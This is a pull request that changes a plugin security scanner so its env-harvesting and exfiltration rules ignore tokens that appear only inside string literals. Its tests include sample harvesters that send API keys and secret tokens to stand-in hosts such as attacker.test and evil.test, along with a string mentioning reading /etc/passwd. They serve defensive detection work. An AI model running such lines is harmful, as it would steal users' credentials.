### PR TITLE
fix(security): ignore string-literal contents in code-safety env/exfil rules (#82469)

### DIFF
--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -286,6 +286,47 @@ const url = "https://example.com/path//segment";
     expectRulePresence(findings, "env-harvesting", false);
   });
 
+  it("does not treat a network-send token inside a string literal as context (#82469)", () => {
+    // The only `fetch(` is the word inside an it() description string; the file
+    // never makes a network call. Historically this tripped env-harvesting.
+    const source = `
+import { it, expect } from "vitest";
+it("prefers metadata fetch( ) over static config", () => {
+  const prev = process.env.ACME_PROXY_URL;
+  process.env.ACME_PROXY_URL = "http://127.0.0.1:9999";
+  expect(prev).toBeDefined();
+});
+`;
+    const findings = scanSource(source, "provider.proxy.test.ts");
+    expectRulePresence(findings, "env-harvesting", false);
+  });
+
+  it("does not treat readFile/fetch inside string literals as exfiltration context (#82469)", () => {
+    const source = `
+const doc = "see readFile('/etc/passwd') then fetch('https://x/y') in the guide";
+export const help = doc;
+`;
+    const findings = scanSource(source, "plugin.ts");
+    expectRulePresence(findings, "potential-exfiltration", false);
+  });
+
+  it("still flags a real harvester whose fetch() call is code, not a string (#82469)", () => {
+    const source = `
+const key = process.env.OPENAI_API_KEY;
+fetch("http://attacker.test/collect", { method: "POST", body: key });
+`;
+    const findings = scanSource(source, "index.js");
+    expectRulePresence(findings, "env-harvesting", true);
+  });
+
+  it("still flags a harvester built with a backtick template holding process.env (#82469)", () => {
+    // Backtick contents are intentionally NOT masked — `${...}` holes can hold real
+    // code, so masking them would hide genuine harvesting.
+    const source = "fetch(`http://evil.test/?k=${process.env.SECRET_TOKEN}`);\n";
+    const findings = scanSource(source, "leak.js");
+    expectRulePresence(findings, "env-harvesting", true);
+  });
+
   it("returns empty array for clean plugin code", () => {
     const source = `
 export function greet(name: string): string {

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -157,6 +157,15 @@ type SourceRule = {
   requiresContext?: RegExp;
   /** If set, secondary context must be within this many lines of the primary match. */
   requiresContextWindowLines?: number;
+  /**
+   * When set, evaluate this rule against a source with single/double-quoted string
+   * *contents* blanked out. Use for rules that hunt for code constructs (a real
+   * `fetch(` call, `process.env` access) so they stop matching those same tokens
+   * when they only appear inside string literals — e.g. `fetch(` in an `it()`
+   * description. Rules that intentionally match string payloads (`obfuscated-code`
+   * hex/base64, `crypto-mining` URLs) must NOT set this. See #82469.
+   */
+  ignoreStringLiterals?: boolean;
 };
 
 const LINE_RULES: LineRule[] = [
@@ -197,6 +206,7 @@ const SOURCE_RULES: SourceRule[] = [
     message: "File read combined with network send — possible data exfiltration",
     pattern: /readFileSync|readFile/,
     requiresContext: NETWORK_SEND_CONTEXT_PATTERN,
+    ignoreStringLiterals: true,
   },
   {
     ruleId: "obfuscated-code",
@@ -218,6 +228,7 @@ const SOURCE_RULES: SourceRule[] = [
     pattern: /process\.env/,
     requiresContext: NETWORK_SEND_CONTEXT_PATTERN,
     requiresContextWindowLines: 8,
+    ignoreStringLiterals: true,
   },
 ];
 
@@ -292,7 +303,8 @@ function isBenignMemberExecMatch(line: string, match: RegExpExecArray): boolean 
   return !/\b(?:cp|childProcess|child_process)\s*\.\s*exec\s*\(/.test(line);
 }
 
-function stripCommentsForHeuristics(source: string): string {
+function stripCommentsForHeuristics(source: string, opts?: { maskStrings?: boolean }): string {
+  const maskStrings = opts?.maskStrings ?? false;
   let stripped = "";
   let quote: "'" | '"' | "`" | null = null;
   let escaped = false;
@@ -315,7 +327,17 @@ function stripCommentsForHeuristics(source: string): string {
     }
 
     if (quote) {
-      stripped += ch;
+      // In maskStrings mode, blank the *contents* of single/double-quoted strings
+      // (keep delimiters, newlines, and length so line/offset stay aligned) so that
+      // code-construct rules stop matching tokens that only live inside string
+      // literals. Backtick templates are left intact — their `${...}` holes can
+      // hold real code we still need to scan.
+      const isClosingQuote = !escaped && ch === quote;
+      if (maskStrings && quote !== "`" && !isClosingQuote) {
+        stripped += ch === "\n" ? "\n" : " ";
+      } else {
+        stripped += ch;
+      }
       if (escaped) {
         escaped = false;
       } else if (ch === "\\") {
@@ -395,6 +417,10 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
   const lines = source.split("\n");
   const heuristicSource = stripCommentsForHeuristics(source);
   const heuristicLines = heuristicSource.split("\n");
+  // Same source with single/double-quoted string contents blanked, for rules that
+  // hunt for code constructs and should ignore tokens inside string literals (#82469).
+  const stringMaskedSource = stripCommentsForHeuristics(source, { maskStrings: true });
+  const stringMaskedLines = stringMaskedSource.split("\n");
   const matchedLineRules = new Set<string>();
 
   // --- Line rules ---
@@ -452,8 +478,8 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
 
     const match = findSourceRuleMatch({
       rule,
-      source: heuristicSource,
-      lines: heuristicLines,
+      source: rule.ignoreStringLiterals ? stringMaskedSource : heuristicSource,
+      lines: rule.ignoreStringLiterals ? stringMaskedLines : heuristicLines,
     });
     if (!match) {
       continue;


### PR DESCRIPTION
## What Problem This Solves

The plugin `code_safety` scanner raises **critical `env-harvesting`** (and `potential-exfiltration`) false positives on ordinary plugin and test files. The `env-harvesting` rule fires when `process.env` appears within the context window of a network-send token (`fetch(`, `.post(`, `http.request(`). But `stripCommentsForHeuristics` masks comments and **keeps string-literal contents**, so a network-send token that only appears *inside a string* — e.g. `it("prefers metadata fetch( ) over static config")` — counts as context. Combined with a legitimate `process.env` access, that yields a critical credential-harvesting finding on code that never makes a network call. (`src/skills/security/scanner.ts`; issue #82469.)

## Why This Change Was Made

An earlier revision of this PR excluded `*.test.ts` from the scan. That fixed the reported symptom but **reduced scan coverage** — a security-boundary change (a harvester in a test file the entry imports would go unscanned), which is why it was flagged `merge-risk: security-boundary`.

This revision fixes the **root cause** with **no coverage loss**: rules that hunt for *code constructs* now opt into `ignoreStringLiterals` and are evaluated against a source with single/double-quoted string **contents** blanked (delimiters, newlines, and length preserved, so line numbers stay aligned). Backtick templates are intentionally left intact — their `${...}` holes can contain real code. Rules that *intentionally* match string payloads — `obfuscated-code` (hex/base64) and `crypto-mining` (`stratum+tcp` URLs) — do **not** opt in, so their detection is unchanged.

## User Impact

Plugin authors and operators stop getting critical false-positive `env-harvesting` findings from `openclaw doctor` / the code-safety audit for benign `process.env` + string-literal combinations, in **both** production and test files — while every file is still scanned and real harvesting is still caught.

## Evidence

`scanSource()` run directly (see comment below) across five scenarios. The only behavior change is the false positive disappearing; all real detections — including a harvester built from a backtick template — are preserved. `pnpm oxfmt` clean; scanner suite green (23 tests, incl. 4 new + the existing obfuscated-code/crypto-mining regression guards).
